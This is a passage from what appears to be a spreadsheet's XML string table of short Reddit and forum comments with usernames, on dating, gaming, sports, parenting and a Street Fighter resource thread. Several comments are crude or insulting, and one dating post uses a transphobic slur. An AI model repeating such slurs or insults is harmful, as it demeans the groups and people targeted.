    <t>I wish I knew how to trust someone 100%. My walls are still pretty high up regarding this. However, my best advice would be to have a conversation with her about this. Communication is key. Trust is extremely difficult to regain but keep in mind that this girl is not your ex and will not cheat on you. If you’re in school, some colleges have free/inexpensive therapy sessions. It would be nice to attend one or two. Even one session can really help a lot. Good luck OP!</t>
  </si>
  <si>
    <t>chris_0909</t>
  </si>
  <si>
    <t>Thanks for that and the update. I need to try this soon!</t>
  </si>
  <si>
    <t>RebootedBlaze</t>
  </si>
  <si>
    <t>I really wish most people would be respectful to others doing challenges. I was trying to do the hard target and somebody was shooting at me, and this was on our side away from the enemies in team rumble</t>
  </si>
  <si>
    <t>Skormfuse</t>
  </si>
  <si>
    <t>In a skilled based game played skill must always be rewarded above anything that requires less skill. Think of it like a low skill penalty, since you don't want people not to try the higher skilled options. the best options for balancing auto gimbals would be like many games do is to make it take considerably longer to target and harder to maintain target. this then pushes the skill required to piloting. overall you want even low skilled players being rewarded for attempting to manually aim the gimbals, otherwise it's a failure of a skill based system because the auto gimbals are acting as a crutch or a easy mode. if your focusing on flying better than everyone else then that skill should keep you on target longer so the reduction in aim shouldn't matter. but if a person isn't flying well and is using auto gimbals instead of even trying to manually aim then they should lose to most encounters. basically focusing on players skill being the most important factor, which like I said even if reduced aim a skilled pilot should be able to use them. which that is good because it requires better piloting skill to use them while better shooting skills is rewarded by manual gimbals. Then fixed is fixed where both aiming and piloting skill is already a key factor.</t>
  </si>
  <si>
    <t>Welcome to /r/dating_advice! Please keep the [rules](https://www.reddit.com/r/dating_advice/about/rules/) of /r/dating_advice in mind while participating here. Try your best to be kind. Report any rule-breaking behavior to the moderators using the report button. If it's urgent, [send us a message.](https://www.reddit.com/message/compose?to=%2Fr%2Fdating_advice) We rely on user reports to find rule-breaking behavior quickly. Thanks! *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/dating_advice) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>KSGunner</t>
  </si>
  <si>
    <t>But then we went and won it won it in somone else's yard in the end, I would rather have brought home the hardware at the K, but still we got a ring so I can't bitch too much.</t>
  </si>
  <si>
    <t>Rhielle</t>
  </si>
  <si>
    <t>Again… queues for DPS in current level dungeons are never that long. Not once have I ever run into a queue that long as DPS. And if you don’t try, you’ll never get it. So either try to get into a group or sit there and think you can’t, then never get it. You’re being glass is half empty and only keeping yourself from getting it done.</t>
  </si>
  <si>
    <t>the_elbonian</t>
  </si>
  <si>
    <t>Simmons still hasn’t hit a 3. Preseason doesn’t count for shit</t>
  </si>
  <si>
    <t>gawgun</t>
  </si>
  <si>
    <t>Lmao I got an identical capsule... I'm just going to eat it man</t>
  </si>
  <si>
    <t>CCast88</t>
  </si>
  <si>
    <t>It has pineapple... I hate it...</t>
  </si>
  <si>
    <t>80% on the charger 80%</t>
  </si>
  <si>
    <t>starryeyesblurryeyes</t>
  </si>
  <si>
    <t>The entirety of the album E•MO•TION</t>
  </si>
  <si>
    <t>candleshoe</t>
  </si>
  <si>
    <t>My kids use school given laptops to get their school work done. There's no giving up social media. When they're doing their homework, social media pops up all the time. It's a huge complaint of mine. However, there's little to nothing I can do about it other than taking away their laptops, and that won't work unless I'm willing to let them fail their classes. Nelson thinking that they can just set aside social media is delusional. This ship sailed years ago! This is one "goal" that I'm not worried about.</t>
  </si>
  <si>
    <t>incorrectComments</t>
  </si>
  <si>
    <t>You can ONLY solo Zulrah. There is no other option.</t>
  </si>
  <si>
    <t>MommySimonson</t>
  </si>
  <si>
    <t>Recieved this today, came all the way from Poland!</t>
  </si>
  <si>
    <t>&gt;&gt;480402627 Sterling is the biggest industry cuck I know. His whole shtick is being contrarian, so as soon as people started shitting on big companies as much as him, he started defending the most ridiculous crap</t>
  </si>
  <si>
    <t>notsosaintly</t>
  </si>
  <si>
    <t>Pretty sure I wouldn't be able to keep my cool if that thing landed on me.</t>
  </si>
  <si>
    <t>Planetsareround</t>
  </si>
  <si>
    <t>I know that! Although it is especially important at indoor ranges. Now if you are shooting quiet .22 rounds then you can go without, as long as you're the only the shooting outside.</t>
  </si>
  <si>
    <t>theliamcraft</t>
  </si>
  <si>
    <t>Why did I read it as target and then fire hoes</t>
  </si>
  <si>
    <t>ShinnyMetal</t>
  </si>
  <si>
    <t>with only a three maps the likely hood of this happening is very high</t>
  </si>
  <si>
    <t>it is 20 years took,late</t>
  </si>
  <si>
    <t>AreYouKanyeWest</t>
  </si>
  <si>
    <t>Just had some German chocolate cake and Americone dream ice cream. Gotta love cake. Let them all eat cake.</t>
  </si>
  <si>
    <t>Scheisse_Schnitzel</t>
  </si>
  <si>
    <t>Nice! I just burst out laughing really loud at that one. I'm sitting by myself on a ferry. People think I'm crazy.</t>
  </si>
  <si>
    <t>SparksTheUnicorn</t>
  </si>
  <si>
    <t>Is this a supposed to be a troll or what?</t>
  </si>
  <si>
    <t>AndiSLiu</t>
  </si>
  <si>
    <t>Apparently it takes 7-14 days after expose before symptoms show, the rash shows about 3-5 days after symptoms first show, and infectiousness about 4 days either side of the rash showing, according to [this](https://kidshealth.org/en/parents/measles.html). So theoretically, if everyone who isn't vaccinated with measles just stays home for about three weeks, and doesn't infect anyone else in the home, it should all disappear.</t>
  </si>
  <si>
    <t>Louie___</t>
  </si>
  <si>
    <t>It’s coming</t>
  </si>
  <si>
    <t>rundiablo</t>
  </si>
  <si>
    <t>LA Noire is listed at 27.5GB in the eShop, I don’t think I’ve seen a single Switch game near 50GB yet. Most are shockingly under 10GB. But LA Noire is a great example of what I mean and was one of the games I cleared. That’s a linear single player game, very little to do once you’ve cleared through the story. Why would you need to keep that game forever hogging over 25GB of your card when there’s so little chance you’ll be going back to it after a play through? You could simply delete the game data, and you’ll have room for potentially many more games. Multiplayer games I totally understand keeping downloaded since you’re likely to play them frequently over long periods of time. Mario Kart, Splatoon, Rocket League, Overwatch, etc. But games that will eventually be completed (or abandoned) don’t have much value taking up that space if you’re never going to play them again in the near or mid term future imo.</t>
  </si>
  <si>
    <t>imaqdodger</t>
  </si>
  <si>
    <t>Dude if it's norms no one cares. That's literally where people go to first time champs and borderline int.</t>
  </si>
  <si>
    <t>Abi39</t>
  </si>
  <si>
    <t>This has replaced an aging J5.Always get Samsungs as they're so easy to use. All apps load very quickly. I have the coral colour which looks so cool.Overall a great mid range phone.</t>
  </si>
  <si>
    <t>trotskeet</t>
  </si>
  <si>
    <t>That’s very obviously the subtext to his comment tho</t>
  </si>
  <si>
    <t>PM-ME-UR-SPAGHETTI</t>
  </si>
  <si>
    <t>Dude the thing with girls claiming to be lesbians is so true and annoying. We get girls over in the gay community that are straight up happily married to dudes and get mad if anyone says they’re bi. If you say they’re making lesbians look like they’re not really gay they don’t listen and say “my label doesn’t affect anybody”. It’s so bad that even though I am a lesbian, I can be skeptical of other girls who say they are because there’s so many attention seekers lol. I’ve learned that there’s a lot of gay guys who are bi too though. A lot of the guys people assume are gay like girls too. You just hear about it less, probably because it’s easier to find someone to fuck on Grindr than tinder if you’re into both. Im confused though, are you saying we’re secretly into each other lol? It was just something dumb we did just to try it, though he seems to have realized he likes girls</t>
  </si>
  <si>
    <t>LegoMyDoggo</t>
  </si>
  <si>
    <t>She hasn’t so my hopes are way up</t>
  </si>
  <si>
    <t>MrBenzedrine</t>
  </si>
  <si>
    <t>I'll take all the toffee pennies then!</t>
  </si>
  <si>
    <t>Pelican_Brief_noine</t>
  </si>
  <si>
    <t>Please be a joke. Look at those biceps, zero definition. This prick wouldn't win any chin up contests that's for sure.</t>
  </si>
  <si>
    <t>Felix_Hoang</t>
  </si>
  <si>
    <t>Yeah it happened to my cousins as well. Still not unlocked</t>
  </si>
  <si>
    <t>pseudo_meat</t>
  </si>
  <si>
    <t>Lollll are you taking about r/badwomenanatomy That’s like literally the opposite of a misogynist subreddit. At least look at the sub before trying to act like you know what you’re talking about. Hilarious.</t>
  </si>
  <si>
    <t>ThanosTheAttorney</t>
  </si>
  <si>
    <t>What your doing wrong is making the white box too big....</t>
  </si>
  <si>
    <t>ahem listen here ladies, Im 20, nearly 21 years old and still a virgin. I have never even held hands with a another girl so Im basically a mint pristine man. if you want and try and be my gf, these qualities would work the most You will not talk to any other male while we talk. We must share the bare minimum similar interests, such as video games, and anime. Be born a biological female.(verification required, and no trannies) Don't be obese, slightly chubby is acceptable but do not be obese. Optional:Yandere My contact information is KazFromR9k#3699 Feel free to add me, if I dont respond quickly I probably fell asleep</t>
  </si>
  <si>
    <t>Jabberwocky416</t>
  </si>
  <si>
    <t>I really wish they would change their mind and put non-standards back in the rotation. I was in favor of them when I was in challenger, and I’m still in favor now that I’m in Diamond. Seeing what new map shapes and designs were coming used to be my favorite part of any update.</t>
  </si>
  <si>
    <t>audienceandaudio</t>
  </si>
  <si>
    <t>In the premier league over the last decade, probably just about. We haven’t had many good RBs in the last decade really, who would he be competing with - Kyle Walker maybe, but there’s really no other good shouts for RB.</t>
  </si>
  <si>
    <t>jjj2018</t>
  </si>
  <si>
    <t>LPT: If you’re searching for free software look up “open source” instead of “free” and you’ll avoid 7 day trial software as well as obtain actually free software.</t>
  </si>
  <si>
    <t>Padgriffin</t>
  </si>
  <si>
    <t>I mean he had a massive rotating saw. One blow and Ruby would instantly get poofed.</t>
  </si>
  <si>
    <t>Twotribes</t>
  </si>
  <si>
    <t>Quote: : ORIGINAL: MrsWargamer Now keep in mind guys, I'm not as young as yer Aussie cuties, I'm 2 birthdays from 60. I think I'm pretty good for my age. I'd have been a bit bolder, but, I'm kinda hairy down there :) My fiance likes me furry, and my suit is a bit skimpy :) I need some time in the gym too unfortunately. How rude of me I forgot to say how Lovely you look, hubba hubba. I am 62 on Friday by the way.</t>
  </si>
  <si>
    <t>sergio471</t>
  </si>
  <si>
    <t>Maybe, but for the context: I love my job, my life and my kid, so I have a lot to lose. If you have any ideas then I’m all ears.</t>
  </si>
  <si>
    <t>MetroSexual124</t>
  </si>
  <si>
    <t>Sometimes, I just put a mug of water in the microwave for two minutes and drink it. No tea. Just hot water.</t>
  </si>
  <si>
    <t>RajaRajaC</t>
  </si>
  <si>
    <t>Lmao you serious? Isn't the favorite meal of a Mongoose, a snake?</t>
  </si>
  <si>
    <t>harrylambert943</t>
  </si>
  <si>
    <t>Respect to you username bro.</t>
  </si>
  <si>
    <t>JRGHomeslice</t>
  </si>
  <si>
    <t>Zman: Your part of the problem. *You’re. Zman: You like to “fix” things to bend the truth. When it comes down to it your “fix” is just imaginary. Fixing your grammar is imaginary? That’s cute. The only ones bending the truth are those saying there is no problem. I wonder. Which camp does that put you in?</t>
  </si>
  <si>
    <t>clruiz370</t>
  </si>
  <si>
    <t>Dang! I didn’t know that. I’m gonna check it out. My uncle actually lives in Mexico and got taken and held for ransom. It was terrible for them. Luckily i live in the US. We got him back though</t>
  </si>
  <si>
    <t>SocialForceField</t>
  </si>
  <si>
    <t>Oh I enjoy the down votes, I don't really care about feelings of those offended cause they didn't know how to use solid works, autocad, or Vegas as a child ... Like ok, but it's still stuff children know how to do, at least at this level. I knew I was going to get the dumb people slap before they did so lol oh well. What is karma even for if not this?</t>
  </si>
  <si>
    <t>joosh82</t>
  </si>
  <si>
    <t>Someone responded with a snarky comment, that's when I saw it had downvotes. If anything it's your fault for commenting, I could have been living in blissful ignorance!</t>
  </si>
  <si>
    <t>WetpigGamer</t>
  </si>
  <si>
    <t>Wow, Minecraft has a secret texture pack! It only activates when the game crashes!</t>
  </si>
  <si>
    <t>Full_iced</t>
  </si>
  <si>
    <t>Laugh. Laugh at the picture.</t>
  </si>
  <si>
    <t>SlitThaClit69</t>
  </si>
  <si>
    <t>No even without spikes the attacks bounce of his horns. I am clearly hitting his head and not horns when I'm not bouncing off. Have u managed to break his horns solo with a gs or only coop? Cuz theres a good chance someone else broke it. I've been trying to break them solo and it seems impossible with the gs</t>
  </si>
  <si>
    <t>RandomWon</t>
  </si>
  <si>
    <t>Great now explain that to the poor cat</t>
  </si>
  <si>
    <t>happypillows</t>
  </si>
  <si>
    <t>&gt;I really don’t know how to deal with this, because cutting him off really isn’t an option (he’s my friend after all). Ok, then I suppose you'll just have to keep going until you dont feel bad about it anymore? I dont see any other solution if you aren't going to adjust the dynamics of your friendship with him. If he's hindering your ability to move forward...then what? What if he's also hooking up with people, but he doesnt really feel any remorse at all? Then the anxiety is all on your end. Or you still should be with him, honestly I dont know. But this isnt a very sustainable situation.</t>
  </si>
  <si>
    <t>triplec787</t>
  </si>
  <si>
    <t>&gt; Since week 3, coaches are 1 for 21 on challenges (as of Oct 11). Is that just PI or all challenges? Cause I think Shanahan is the 1 (had a successful challenge against the Browns in Week 5).</t>
  </si>
  <si>
    <t>skinwalkerspotting</t>
  </si>
  <si>
    <t>yes thank you!</t>
  </si>
  <si>
    <t>ronaldtrip</t>
  </si>
  <si>
    <t>I'm glad that I'm not an Enneagram 5 INTP. A lot of these deficiencies simply don't apply to me.</t>
  </si>
  <si>
    <t>WolfmanAngrymad</t>
  </si>
  <si>
    <t>Worth a shot at $20</t>
  </si>
  <si>
    <t>7at52E96ke</t>
  </si>
  <si>
    <t>A swirling gust of wind perhaps a vent near by? Either way just about any skeptic would take that thing and blow some air against the side to demonstrate a similar behavior so not much you can do other than to go with that because extraordinary claims require extraordinary evidence.</t>
  </si>
  <si>
    <t>eth2275</t>
  </si>
  <si>
    <t>Nope! My record is over double where I am currently, hence my ability to walk in a line and type a coherent sentence for you lovelies to read. I'm currently aboard a loopy and/or creative wave before a long crash.</t>
  </si>
  <si>
    <t>ForumsMobile</t>
  </si>
  <si>
    <t>Quote: from starkmm &gt;&gt; Doubt anyone wants FBs....blocking sucks and on top of that not a lot of people use FB much. Speak for yourself. But there's not many in reality so they'll drop in drips and drabs.</t>
  </si>
  <si>
    <t>CrazyB0T</t>
  </si>
  <si>
    <t>Judging by the small amount of adequate evidence, and the active strangulation of all who point to it. This is clearly throwing shit at the fan. Just to spoil the life of man. So yes. This is a very shitty joke and an attempt to denigrate a person due to his dubious reputation and many dubious rumors.</t>
  </si>
  <si>
    <t>TripleSheepieSupreme</t>
  </si>
  <si>
    <t>He’d been pretty distant for a long long while and I finally was tormented enough to asked him if he even considered me more than a friend now. Answer was “no”, but he waited for agony to finally make me desperate enough to ask just to put an end to the pain of wondering. He’d gotten bored of me. Had never been so genuinely in love with someone before and also had it reciprocated; we shared so much in common he made me believe we had a future together and I just feel like there’s nothing left now in my bleak life to look forward to. I’m so tired of trusting people and giving my all to them and more only for it to yield only hurt in the end. I just needed to let this out where people that understand. I really hope today is kind to you all.</t>
  </si>
  <si>
    <t>Blackout76_</t>
  </si>
  <si>
    <t>I probably missed it or can't remember it but in 7 we learned that Kylo is quite a fan of Vader right? "I will finish what you have started". Actually I'm just wondering if he even has a clue of Vaders history at all. I mean Vader turned back to the light because of Luke. He actually was thankfull to Luke that he didn't lost faith in him. So why is Kylo still trying to be like Vader? If Anakin (so basically Vader) could talk to him he'd probably tell him to stop whatever he's doing and that the dark side is not the right way or not? Also I get that the dark side also was made attractive for him by snoke but why the Vader stuff? He's afraid to not be as powerful as Vader and Snoke too mentioned Vader once to him. I simply don't get that. But maybe it makes sense to me if someone feels like explaining it.</t>
  </si>
  <si>
    <t>The_Son_of_Suns</t>
  </si>
  <si>
    <t>I don't think I said I was going to write one. I was really looking forward to what Star Wars you drew, but you've submitted nothing.</t>
  </si>
  <si>
    <t>Archieie</t>
  </si>
  <si>
    <t>Hmmmm... assuming 3 of those 6 are G2, FPX and SKT, all 3 of the teams are locked in separate groups. FNC, not being able to be drawn in the G2 group has a 66(rounding for easy math)% chance of being drawn into another of the top 6 teams' groups. RNG, not being able to be drawn in the FPX grp has a 66% chance of being drawn into another t6 team's group. 0.66*0.66 = 43~% of both of them being drawn into one of the 3 groups with t6 team in it already. 0.34*0.34 = 11.56% chance of both of them being drawn into the leftover group. Now, depending on if you consider Griffin as the last t6 team, or Damwon, the things become more interesting. If Griffin is your bet, which seems to be the consensus atm, even higher than RNG, then there is a third team in pool 2 that is part of the t6, adding another 0.66, making the chance of all 3 teams evading the 'free' group a 28.7~%. Now, assuming that 28.7% happens, which it did, you have a 50% chance of being drawn in the same group as one of the other t6 teams, leaving us with a 14.37~% chance of a result with 3 out of t6 teams being in the same group, and even more funny, a whooping 3.9%(rounding up to 34% chance of being drawn in free grp cuz why not) of all 3 teams (GRF, FNC, RNG) being drawn in the 'free' group, making the chance of 3 t6 teams in 1 group around 18.27~%. In conclusion, the format is so flawed, and the only reason why it hasn't been exposed as hard as it is now is because the east has never had more than 1 t6 contender, making the 'can't be in the same group as others from your region' bs balance out the groups. Fix format rito.</t>
  </si>
  <si>
    <t>PhilLucifer</t>
  </si>
  <si>
    <t>Lol. Believe me Brian, I am confused too.</t>
  </si>
  <si>
    <t>morron88</t>
  </si>
  <si>
    <t>I actually can't believe how good the art is. Is it easier to do 4koma?</t>
  </si>
  <si>
    <t>MonsieurMidnight</t>
  </si>
  <si>
    <t>I watched the Tag Team match... And in a way it angered me. Because the referee absolutely sucks ass. You have UE cheating all the way through the match, in various occasions yet the referee let it slide EVERY TIME ! The assisted Adbominal Stretch, during the Leglock to put Dawkins back in the middle, Strong interfering at the end... Just WHEN will the referee said "Enough of this bullshit" and cause a DQ ?! I really like Undisputed Era, I really do, but when they capitalise on their heel schtick with interferences all the time without any consequences, it makes me wonder what the fuck are the officials doing ?! Overall, I got worked. I really like Shirai, Thorne did one hell of a match with Gargano he looked super legit, Dunne and Burche was nice hard-hitting action and the Opener with Cole and Riddle was absolutely phenomenal even tho having Riddle kicking out of 2 Panama Sunrises is a blashphemy because of the overall Canadian Destroyer schitck... BUT MY GOD ALL THESE ADDS IT WAS UNBEARABLE ! 1 add minimum per match, the Shirai / Yim got like 2 in the span of 5 minutes, for 5 minutes of the same adds over and over. Holly cow this was annoying to follow NXT after the Opener.</t>
  </si>
  <si>
    <t>ArabicLawrence</t>
  </si>
  <si>
    <t>No, the name comes from [Lawrence of Arabia](https://en.m.wikipedia.org/wiki/T._E._Lawrence) . It’s always been my name online as Orens, Lawrence and LawrenceOfArabia are often already taken.</t>
  </si>
  <si>
    <t>MustardFacial</t>
  </si>
  <si>
    <t>I have a separate 1U server with 128GB of RAM that I use for my really elaborate labs, anything I run on this will just be a quick and dirty test, or like I'll think of some stupid idea and lab it out to see if it works.</t>
  </si>
  <si>
    <t>decrypt512</t>
  </si>
  <si>
    <t>https://www.complex.com/sports/2019/07/damian-lillard-disputes-enes-kanter-six-minutes-to-re-sign-with-blazers-claim</t>
  </si>
  <si>
    <t>CaliHawk14</t>
  </si>
  <si>
    <t>Willbyr</t>
  </si>
  <si>
    <t>Votes bump; two in the green right now. Edited by Willbyr on Oct 10th 2019 at 1:36:13 PM Resize || Upgrades || My dA page</t>
  </si>
  <si>
    <t>paak-maan</t>
  </si>
  <si>
    <t>Alex Light is the worst tackle I’ve had the displeasure of watching. I’d rather have Jimmy Graham there.</t>
  </si>
  <si>
    <t>De-Nomolos</t>
  </si>
  <si>
    <t>I have kids with Elsa and Anna costumes, so I am going to watch it...a lot.</t>
  </si>
  <si>
    <t>GaddockTeegFunPolice</t>
  </si>
  <si>
    <t>Redditors who are in no contact with their parents, what was the reason and how have your lifes changed ?</t>
  </si>
  <si>
    <t>AyanC</t>
  </si>
  <si>
    <t>*I don't care about free speech as I've got nothing to say.*</t>
  </si>
  <si>
    <t>mutatron</t>
  </si>
  <si>
    <t>Amber Guyger protesters who don't know the jury had 7 Blacks and only two whites on it.</t>
  </si>
  <si>
    <t>tobiov</t>
  </si>
  <si>
    <t>My suggestion maintains both individual and team deterrence - you lose 10 mins a man down as a team - individually, you are off all game and face heavy sanction post game. There should be a mandatory minimum 3 match ban for red cards on individuals.</t>
  </si>
  <si>
    <t>jonesyfeels</t>
  </si>
  <si>
    <t>Well, the guy said he cut his knee. I can infer that the kid also cut his knee, and for some reason had to be hospitalized.</t>
  </si>
  <si>
    <t>daebro</t>
  </si>
  <si>
    <t>Hi there, we noticed you're posting about traffic, road conditions, commuting, etc. We ask that these types of submissions are posted to the [Daily Discussion](https://www.reddit.com/r/Atlanta/search?q=daily+discussion&amp;sort=new&amp;restrict_sr=on&amp;t=all) threads. This helps with clutter and you'll likely get better feedback overall.</t>
  </si>
  <si>
    <t>ikkiestmikk</t>
  </si>
  <si>
    <t>Not even the cool kind of gay. The lame 2000s kind of gay.</t>
  </si>
  <si>
    <t>sc0_0ch</t>
  </si>
  <si>
    <t>did he get critically injured swinging a wooden stick or sliding into a rubber base? asking for a friend.</t>
  </si>
  <si>
    <t>the_shit_disturber</t>
  </si>
  <si>
    <t>Me likey the trippy</t>
  </si>
  <si>
    <t>Hitch1up</t>
  </si>
  <si>
    <t>A Clockwork Orange Hoodie from The Stanley Kubrick collection online. Great quality. Highly recommend.</t>
  </si>
  <si>
    <t>TheMShip</t>
  </si>
  <si>
    <t>I don't really feel qualified to start a Westminstenders thread but we need a new one....</t>
  </si>
  <si>
    <t>_JohnnyJohnny</t>
  </si>
  <si>
    <t>That’s “I love you” in sign language.</t>
  </si>
  <si>
    <t>ProPz242</t>
  </si>
  <si>
    <t>I can’t tell what the logo is</t>
  </si>
  <si>
    <t>naro31286</t>
  </si>
  <si>
    <t>LOL. He plays shite for 77 minutes but then comes up big again...what are we gonna do with this guy?</t>
  </si>
  <si>
    <t>Ghost8797</t>
  </si>
  <si>
    <t>Huh, that's the only one I actually liked lol</t>
  </si>
  <si>
    <t>ziplocfullacock</t>
  </si>
  <si>
    <t>Lean with it, rock with it</t>
  </si>
  <si>
    <t>Chasewellbeing</t>
  </si>
  <si>
    <t>Whatâs going on Jojo? Why is it so hard?</t>
  </si>
  <si>
    <t>PickledMustard</t>
  </si>
  <si>
    <t>DOOM always known to keep the best girls backs bent</t>
  </si>
  <si>
    <t>MeridianBay</t>
  </si>
  <si>
    <t>I’ve already given the examples of multiple “fixings” and reboots of development, nothing bothers me about you being a fan. It’s the ignoring of the issues in Bungie’s development cycles that makes you a fanboy</t>
  </si>
  <si>
    <t>scaba23</t>
  </si>
  <si>
    <t>I've been looking forward to checking this out since you mentioned it. My only suggestion about the name is the `alpha` part suggests "the software before the beta" and hence probably very buggy. I know it's part of your name and so you may want to keep it, and I may be the only one who gets that impression from the name. Just something to consider</t>
  </si>
  <si>
    <t>lilathena711</t>
  </si>
  <si>
    <t>I totally get it, and i get where you are both coming from. I had a period of time involving Goetic spirits in my early witching days, and i understand the hunger when you are first learning and realize the potential around you. Sending you guys all my love</t>
  </si>
  <si>
    <t>SloshyOshy</t>
  </si>
  <si>
    <t>Also there's a lot of jumpers. Main cause of train delay are these suicides. They clean it up fast and send a bill to the family.</t>
  </si>
  <si>
    <t>jmcc13</t>
  </si>
  <si>
    <t>My niece's birthday is on Valentine's day and she loves it!</t>
  </si>
  <si>
    <t>saagri</t>
  </si>
  <si>
    <t>I wonder, is the crit chance/damage worth it? Merciless doesn't benefit from it.</t>
  </si>
  <si>
    <t>littlewillie420</t>
  </si>
  <si>
    <t>Yes, would be perfect for film!</t>
  </si>
  <si>
    <t>AeneasDid911</t>
  </si>
  <si>
    <t>I didn't really see him being arrogant, but he definitely was NOT a nerd like P.P is supposed to be. He's too tall and handsome lol, but he does make a good spiderman. What I really didn't like was the fact that he donned the suit to get revenge for uncle Ben, then proceeded to indiscriminately beat the shit out of random people who he deemed "criminals" in order to seek revenge on the OG murderer. Sick stuff</t>
  </si>
  <si>
    <t>honz_</t>
  </si>
  <si>
    <t>I’m not talking about taking up the front two spots closest to the door or taking up two spots in a small parking lot. But, if you take up two spots in the back of a Walmart parking lot or any lot with ample room and your out of the way, your fine. So what if you spent a lot of hard earned money on your car and you want to avoid getting dings from people who could give two fucks about their car or your car. Properly repairing paint and body work is very costly even if it’s just a small ding. It’s not fair to ridicule people who want to protect their belongings from careless people or people who may simply not be paying attention.</t>
  </si>
  <si>
    <t>NotAnElement</t>
  </si>
  <si>
    <t>Why not punch the case?</t>
  </si>
  <si>
    <t>Ecosse2014</t>
  </si>
  <si>
    <t>Thanks for all your thoughts :) In regards to cold in Hanoi, I'm from Scotland, so pretty sure it will be warm weather clothes for me! In terms of transports most are direct flights between locations. Could definitely shave some time of the beach and on to SR.</t>
  </si>
  <si>
    <t>Astroman129</t>
  </si>
  <si>
    <t>Sounds like your street smarts are in check. I wouldn't report anything since nothing really happened, but something fishy was definitely going on. I wouldn't have given them my time of day after they asked me to take out my phone.</t>
  </si>
  <si>
    <t>codeOrCoffee</t>
  </si>
  <si>
    <t>Right but it is fair use.</t>
  </si>
  <si>
    <t>Skhmt</t>
  </si>
  <si>
    <t>The two profile Caladius is worth taking for ranged anti-tank if you're running pure Custodes. That or the Ares are the best options for that role. Otherwise, you're better off with tank commanders or knights or dunecrawlers or that bs 2+ quad las space marine dread for your ranged anti-tank. SG are overall better than regular Guard, but I'm more of the opinion of taking two squads of SG and one of CG when running pure Custodes. Be aggressive with the CG squad by teleporting them. The SG squads hold objectives.</t>
  </si>
  <si>
    <t>Andrew</t>
  </si>
  <si>
    <t>Originally posted by skydy View Post ...and again, excused after refusals and no crop. the moment she walked in the horse was not there to play horse show today...</t>
  </si>
  <si>
    <t>Prayerfulmum</t>
  </si>
  <si>
    <t>Delivering the placenta didn’t hurt at all (for me). The pressing on the stomach and those after birth contractions are honestly the worst part of the whole process for me. But ibuprofen helps with the after part. Also if you are breastfeeding empty your bladder first. Like pp said you don’t have to hold baby while this is going on.</t>
  </si>
  <si>
    <t>BlatheringMM</t>
  </si>
  <si>
    <t>The UN had to compromise it's integrity to get the world powers to join and more importantly stay. That's why the whole veto thing came into being.</t>
  </si>
  <si>
    <t>SeedlessJellybeans</t>
  </si>
  <si>
    <t>Then smoke somewhere else twat</t>
  </si>
  <si>
    <t>RadiantDebate</t>
  </si>
  <si>
    <t>i'd like to think whoever left those notes on her bed new what they were doing. They new their coe workers were falsifiy documents and wanted to give her the proof without coming out on their own as a whistleblower.</t>
  </si>
  <si>
    <t>Caluser2000</t>
  </si>
  <si>
    <t>How good is the cmos battery?</t>
  </si>
  <si>
    <t>Wujastic</t>
  </si>
  <si>
    <t>And your nerves react to being stabbed with a knife. And your soul reacts to your dog assing away.</t>
  </si>
  <si>
    <t>ActDude21</t>
  </si>
  <si>
    <t>i think i get it now when i read it more carefully</t>
  </si>
  <si>
    <t>A-Reliable-Source</t>
  </si>
  <si>
    <t>Sounds way over dramatized. I’m guessing your objection is a so-called “moral” one from the tone of your post as you’ve given no examples of how this person is actually endangering anyone. So here’s what you should do: PATH ONE: grow up, mind your own damn business, focus on forging non-supervisory relationships with others, enjoy life, friendships and positive professional associations. PATH TWO: go full after school special on his ass - you’ll teach him a lesson by telling! you’ll probably get him fired despite the fact he’s actually hurt no one and there is no reason to expect he will hurt anyone, save for your prejudices against folk who engage in activities you do not. oh oh, then go to class every day pretending all your peers don’t know what you did, maybe dramatize how close you all came to dying in this person’s presence when some mentions their absence to deflect, and wonder why no one really trusts you, wants to work with you, recommends you to others, or offers you work. Either way, the only thing actually being endangered here is your maladapted sense of what is or is not a moral issue.</t>
  </si>
  <si>
    <t>#This thread provides a place for everyone to ask simple questions and chat about anything reasonably on topic. To new players and new members of the community alike we encourage you tap into all of the resources of this sub. * If you're a new player looking for players around your same skill level, check out the [New Challenger](https://discord.gg/SvN32B5), the go to place for new players trying to level up! * [**How to complete Street Fighter V’s Weekly missions**](http://shoryuken.com/2018/01/31/keep-the-fight-money-flowing-how-to-complete-all-of-street-fighter-vs-cryptic-weekly-missions/) at SRK * If you want to learn how to play and become a better player at Street Fighter V, you must check out the useful resources below: &gt; - [Gief's Gym, practical lessons on how to improve at fighting games](https://www.reddit.com/r/streetfighter/wiki/v/giefsgym) by /u/Joe_Munday: &gt; - [How to learn Street Fighter, a framework for beginners](https://redd.it/5fznn7) by /u/synapticimpact &gt; - [Two minute tutorials, a series of videos designed to teach new players fundamentals](https://www.youtube.com/playlist?list=PLPVQbPLIRM2DkSwHNredA_HVvgGm2GYq9) by /u/PugilistPenguin &gt; - [Think, Don't Mash!](https://www.youtube.com/channel/UC7fBeU_XVP_HOvGKJI30YKA/playlists), learn fighting games by starting with a basic plan, by Press Button Win &gt; - [Tips for Players in Rookie, Bronze, and Silver](https://redd.it/5jy8pb) by /u/Truen1ght &gt; - [Rhythm in Street Fighter](https://youtu.be/Ib26t1TUFRw) by NeverKnowsBest00 &gt; - [How to Read Frame Data](https://www.youtube.com/watch?v=1SKZLnwdq5U) by /u/pdcsky &gt; - [10 Minute Session](https://www.youtube.com/user/AlexMyersSf4/featured) by Alex Myers /u/AlexMyersss &gt; - [Speedrun Specials](https://www.youtube.com/playlist?list=PLSINorqRPxHn3EGl0zIDU7NowkxyZrklc) by Frame Advantage /u/tyrant_uk &gt; - [Just Frame Analysis](https://www.youtube.com/playlist?list=PL3zIZC81cOF6hDUl2NvE05datU0aNT9su) by HiFight /u/HiFight &gt; - [SFV Chris Tips](https://www.youtube.com/channel/UC40fb6xWMvftRx_MaZea7mg) by Chris Tatarian &gt; - [Character Discussion, weekly discussion and collection of tips, tricks, combos and tutorials](https://www.reddit.com/r/StreetFighter/wiki/v/character_discussion/#WCD) * Just want to chat? Come visit the [**r\/StreetFighter OnLine Local Discord**](https://discord.gg/pVUHbgX)! * Test your skills in our weekly [OnLine Local Tournament](https://www.reddit.com/r/StreetFighter/wiki/v/rsf_sfv_weekly_tournament/#tourney), hosted by /u/Joe_Munday! * Podcasts that keep you informed about what's going on in the FGC: &gt; - [r\/SF Radio by /u/Joe_Munday](https://rsfpodcast.podbean.com/) &gt; - [Best of V](https://twitter.com/BestOfVShow) &gt; - [UltraChenTV](https://twitter.com/UltraChenTV) &gt; - [FGC Philosophy](https://fgcphilosophy.podbean.com/) &gt; - [Street Fighter Podcast from Justin 